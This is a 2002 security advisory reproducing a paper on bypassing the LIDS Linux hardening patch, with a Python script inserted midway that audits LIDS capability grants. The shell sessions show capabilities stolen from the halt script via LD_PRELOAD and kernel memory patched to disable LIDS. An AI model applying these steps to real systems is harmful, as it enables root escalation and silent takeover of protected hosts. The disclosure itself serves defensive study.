15th Jan 2002 [SBWID-4997]
COMMAND
LIDS misconceptions lead to local root compromise
SYSTEMS AFFECTED
lids 1.1.0pre6-2.4.14
PROBLEM
From stealth's <stealth@segfault.net> paper
[http://stealth.7350.org/lids-hack.tgz]:
--[ Introduction
LIDS was developed to protect systems from malicious roots which may
creep in via various system holes such as bugs in wu-ftpd etc. In the
absence of "real protection" the LIDS developers felt that they needed
to create some sort of sandbox so that evil attackers who gained
root access to the host would not be able to replace important
system files such as /bin/login. They should also not be able to kill
important processes such as httpd or to modify the system logs.
I will show step by step that LIDS not only fails to protect
the system from attackers but is also a security hole in itself which
allows users to gain root access in certain configurations. Further,
LIDS may be abused as a rootkit for hiding files or processes.
--[ 1. How to determine you are LIDS'ed
Let's assume that we already gained root on our test box. This is not
very difficult as a lot of local root holes exist in almost all Linux
distributions. Choose one of the kernel bugs, crontab, modprobe or sperl
:-). LIDS does not stop users from gaining uid 0. LIDS was only designed
to place restrictions on users with uid 0 (root).
linux:~ # ls -la /proc/sys/lids/locks
-rw------- 1 root root 0 Dec 31 21:22 /proc/sys/lids/locks
linux:~ # touch /sbin/x
touch: creating `/sbin/x': Operation not permitted
linux:~ #
Ok. This is easy. The system is LIDSed. Obviously the administrator put
a READONLY rule on the /sbin directory.
Finding out which configuration the LIDS box has is already the hardest
part. We may do that with brute force. I wrote a tool called "capscan"
which tells you which restrictions apply to you.
--[ What did they do with root?
linux:~ # cd /tmp/lids/
linux:/tmp/lids # ./capscan -b
b 0 CAP_CHOWN
b 5 CAP_KILL
b 6 CAP_SETGID
b 7 CAP_SETUID
b 23 CAP_SYS_NICE
b 27 CAP_MKNOD
linux:/tmp/lids #
Aha. Capscan bruted the most important capabilities for us. We need to
brute-force (i.e. try chown(), try create_module(), try chroot(), ...)
because LIDS does not use the Linux kernel's capability bits inside
the task struct, so we can't obtain them via capget().
To better understand which restrictions are placed on the system, we
will have a look at the configuration:
linux:~ # lidsconf -L
LIST
Subject ACCESS(inherit) time Object
-----------------------------------------------------
Any file READONLY(domain): 0 0000-0000 /etc
Any file READONLY(domain): 0 0000-0000 /sbin
Any file READONLY(domain): 0 0000-0000 /bin
Any file READONLY(domain): 0 0000-0000 /usr
Any file READONLY(domain): 0 0000-0000 /lib
Any file DENY(domain): 0 0000-0000 /etc/lids
Any file DENY(domain): 0 0000-0000 /etc/shadow
Any file APPEND(domain): 0 0000-0000 /var/log
/bin/login READONLY(domain): 0 0000-0000 /etc/shadow
/bin/su READONLY(domain): 0 0000-0000 /etc/shadow
/etc/init.d/halt GRANT(domain):1000 0000-0000 CAP_SYS_ADMIN
/etc/init.d/rc GRANT(domain):1000 0000-0000 CAP_SYS_ADMIN
/etc/init.d/rc GRANT(domain):1000 0000-0000 CAP_NET_ADMIN
/etc/init.d/halt GRANT(domain):1000 0000-0000 CAP_NET_ADMIN
/etc/init.d/halt GRANT(domain):1000 0000-0000 CAP_SYS_RAWIO
/etc/init.d/halt GRANT(domain):1000 0000-0000 CAP_INIT_KILL
/etc/init.d/rc GRANT(domain):1000 0000-0000 CAP_INIT_KILL
/bin/login GRANT(domain): 0 0000-0000 CAP_SYS_ADMIN
/bin/login GRANT(domain): 0 0000-0000 CAP_NET_ADMIN
Any file READONLY(domain): 0 0000-0000 /boot
The attacker is not able to issue the "lidsconf -L" command. This
command was issued from a LIDS free session, which root may enter by
giving the correct password. The attacker does not know the password, so we
have to look for some other way. Almost all systems will have
CAP_SYS_ADMIN granted to the bootup and the shutdown scripts, as
otherwise you won't be able to mount your disk etc. CAP_NET_ADMIN is
needed too, to configure your network, and CAP_SYS_RAWIO is needed
by some programs. I took this config more or less from the examples
shipped with LIDS. As you see, the appropriate system directories are
protected, etc. For our purposes it does not matter which directories
we can modify or not, so do not get stuck on this. The inherit level
tells LIDS how many fork()s deep within the program the same
capability is still granted. /etc/init.d/rc for example is a
shell script and forks off a lot of commands such as 'ifconfig' etc.
and thus it needs to have a certain inheritance level. Usually you'd
use -1 (-1 means unlimited inheritance) here, but I never got it
working with -1 (bug?) and so I used 1000.
--[ Gimme your CAPs, please!
The following seems really trivial, but LIDS is just leaking
capabilities bound to certain programs, such as /etc/init.d/halt in
this example. The "x" shell script will create a shared object
/tmp/boom.so which forks a shell. Nothing special. When executing the
/etc/init.d/halt script we preload this shared object and obtain the
shell from it. Let's go...
linux:/tmp/lids # ./x
OK
linux:/tmp/lids # LD_PRELOAD=/tmp/boom.so /etc/init.d/halt
linux:/tmp/lids # ./capscan -b
b 0 CAP_CHOWN
b 5 CAP_KILL
b 6 CAP_SETGID
b 7 CAP_SETUID
b 12 CAP_NET_ADMIN
b 17 CAP_SYS_RAWIO
b 21 CAP_SYS_ADMIN
b 23 CAP_SYS_NICE
b 27 CAP_MKNOD
linux:/tmp/lids #
We obtained CAP_SYS_ADMIN, CAP_SYS_RAWIO and CAP_NET_ADMIN from the
halt script. It could not be easier. This will also work with the setuid
capability granted to xinetd for example. Users may gain root with the
help of LIDS!!! The inherit level does not come into play here, even 0
would work fine for giving users a root shell.
Let me sum up what happened until here: capabilities such as
CAP_SYS_RAWIO are leaking ("inherited") to any subprocess if an
appropriate inherit level was placed on the file. We may gain these
capabilities via preloading shared objects or by setting the $PATH
variable if the file is actually a shell script. Even if the
inherit level is 0, i.e. the capability is not inherited across fork(),
the LD_PRELOAD trick still works. That is because preloading does not
create subprocesses, and inside our preloaded library we may call
setuid(0) if CAP_SETUID was granted. The executed shell will then be a
root shell.
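For administrators reviewing their own rule set against the leak described above, here is an added example (not part of the paper or of the LIDS tools) that parses a `lidsconf -L` listing and reports, per GRANT subject, which of the described routes would hand its capabilities to other code. The sample rows are copied from the listing earlier on this page; the names `parse_rules`, `audit_grants` and `is_script_on_disk`, and the choice to rate CAP_SYS_RAWIO and CAP_SETUID as critical, are assumptions of this sketch.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the rows from the `lidsconf -L` listing above.
SAMPLE_LISTING = """\
Subject ACCESS(inherit) time Object
-----------------------------------------------------
Any file READONLY(domain): 0 0000-0000 /sbin
Any file DENY(domain): 0 0000-0000 /etc/shadow
/bin/login READONLY(domain): 0 0000-0000 /etc/shadow
/etc/init.d/halt GRANT(domain):1000 0000-0000 CAP_SYS_ADMIN
/etc/init.d/rc GRANT(domain):1000 0000-0000 CAP_NET_ADMIN
/etc/init.d/halt GRANT(domain):1000 0000-0000 CAP_SYS_RAWIO
/bin/login GRANT(domain): 0 0000-0000 CAP_SYS_ADMIN
"""

# subject, ACCESS(domain):inherit, time window, object (path or capability)
RULE = re.compile(
    r"^(?P<subject>.+?)\s+(?P<access>[A-Z]+)\(domain\):\s*"
    r"(?P<inherit>-?\d+)\s+(?P<time>\d{4}-\d{4})\s+(?P<object>\S+)\s*$"
)

# Capabilities the paper shows being turned against the host (assumed rating).
CRITICAL = {
    "CAP_SYS_RAWIO": "kernel memory can be patched to switch LIDS off",
    "CAP_SETUID": "setuid(0) is reachable from code loaded into the subject",
}


def parse_rules(listing):
    """Return one dict per rule row; header and separator rows are skipped."""
    rules = []
    for line in listing.splitlines():
        m = RULE.match(line.strip())
        if m:
            rule = m.groupdict()
            rule["inherit"] = int(rule["inherit"])
            rules.append(rule)
    return rules


def is_script_on_disk(path):
    """True if the file starts with '#!' (interpreted, so $PATH lookups apply)."""
    try:
        with open(path, "rb") as fh:
            return fh.read(2) == b"#!"
    except OSError:
        return False


def audit_grants(rules, is_script=is_script_on_disk):
    """Group GRANT rules by subject and list how each grant can reach other code."""
    grants = defaultdict(lambda: {"caps": set(), "inherits": False})
    for r in rules:
        if r["access"] == "GRANT":
            grants[r["subject"]]["caps"].add(r["object"])
            # any non-zero level (including -1, unlimited) passes caps to children
            grants[r["subject"]]["inherits"] |= r["inherit"] != 0
    findings = []
    for subject in sorted(grants):
        g = grants[subject]
        vectors = ["LD_PRELOAD"]              # per the paper, works even at level 0
        if is_script(subject):
            vectors.append("PATH")            # scripts resolve commands via $PATH
        if g["inherits"]:
            vectors.append("child processes")
        critical = sorted(c for c in g["caps"] if c in CRITICAL)
        findings.append({"subject": subject, "caps": sorted(g["caps"]),
                         "vectors": vectors, "why": [CRITICAL[c] for c in critical],
                         "severity": "critical" if critical else "high"})
    return findings


if __name__ == "__main__":
    # Assumption for the sample: the init scripts are shell scripts.
    for f in audit_grants(parse_rules(SAMPLE_LISTING),
                          is_script=lambda p: p.startswith("/etc/init.d/")):
        print(f["severity"], f["subject"], f["caps"], f["vectors"], f["why"])
```

On a live host, feed it the output of `lidsconf -L` from a LIDS free session and leave `is_script` at its default so the subjects are checked on disk.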
LIDS however is still in the kernel and protects /sbin and other
directories from tampering. So let's continue:
linux:/tmp/lids # cc lidsoff.c -o l
linux:/tmp/lids # grep lids /proc/ksyms
c02a2120 lids_load_Ra57ab5ad
c0120a10 lids_cap_log_R0d747633
c011e088 lids_cap_time_checker_R9f27daab
c02a2124 lids_local_on_R641824fe
c02a212c lids_local_pid_R2a2dd337
c011dfb0 lids_local_off_R445f75c1
linux:/tmp/lids # touch /sbin/x
touch: creating `/sbin/x': Operation not permitted
linux:/tmp/lids # ls -la /etc/lids
ls: /etc/lids: No such file or directory
linux:/tmp/lids # ./l
Usage: ./l <addr-of-lids_local_on-in-hex>
linux:/data5/cvs-work/lids # ./l c02a2124
# Patching [c02a2120]
1 -> 0
disabled global LIDS protection
linux:/tmp/lids # ls -la /etc/lids
total 32
drwxr-xr-x 2 root root 4096 Dec 31 15:23 .
drwxr-xr-x 52 root root 8192 Dec 31 19:12 ..
-rw-r--r-- 1 root root 6760 Dec 30 21:11 lids.cap
-rw-r--r-- 1 root root 987 Dec 31 15:48 lids.conf
-rw-r--r-- 1 root root 970 Dec 30 21:11 lids.net
-rw-r--r-- 1 root root 40 Dec 30 21:23 lids.pw
linux:/tmp/lids # touch /sbin/x
linux:/tmp/lids # ./capscan -b
b 0 CAP_CHOWN
b 5 CAP_KILL
b 6 CAP_SETGID
b 7 CAP_SETUID
b 10 CAP_NET_BIND_SERVICE
b 12 CAP_NET_ADMIN
b 16 CAP_SYS_MODULE
b 17 CAP_SYS_RAWIO
b 18 CAP_SYS_CHROOT
b 19 CAP_SYS_PTRACE
b 21 CAP_SYS_ADMIN
b 23 CAP_SYS_NICE
b 27 CAP_MKNOD
linux:/tmp/lids #
"lidsoff" is just patching the "lids_load" variable in the kernel to 0.
LIDS won't check any actions anymore then. This is possible because
/etc/init.d/halt was leaking the CAP_SYS_RAWIO capability to us.
Capscan shows that we got all important capabilities (capscan does not
try some capabilities such as CAP_SYS_REBOOT etc. :-) We are done! The
"1 -> 0" tells you that LIDS is disabled.
--[ Discussion
You may be surprised how easy it was to disable LIDS. There are other
ways to do it. One may hijack a LIDS free session by using a simple TTY
hijacker. Commands may easily be inserted into the administrator's terminal.
I don't like the idea of sandboxing root, there is too much that may
be overlooked and which is not that easy to fix. One thing is that
they still share the same home directory. Even though you can make it
read-only, I don't feel comfortable with it. Rather I like systems with
ACLs which may be applied to files and a capability system where root
is still root but programs such as "passwd" or "ssh" don't have
setuid root but appropriate capabilities. SELinux is a far better
approach for this, even if I hope that .gov extensions will never make
it into the Linux kernel. Putting a portscan detector into the Linux
kernel is probably also a bad idea. As little code as possible in
critical parts of the system!
Once an attacker has broken your LIDS system, he does not even need to
install a rootkit, LIDS is one. It allows for hiding files and
processes, and once the attacker has changed the LIDS password, the
administrator has lost his machine.
--[ Links
[LIDS] http://www.lids.org
LIDS system, FAQs and documentation for LIDS.
I tried version lids-1.1.0pre6-2.4.14.
[capscan] http://stealth.7350.org/lids-hack.tgz
This paper and the programs described in it.
[SELinux] http://www.nsa.gov/selinux
SEcure Linux. One more toy to play with at home.
Exploit:
========
SOLUTION
None yet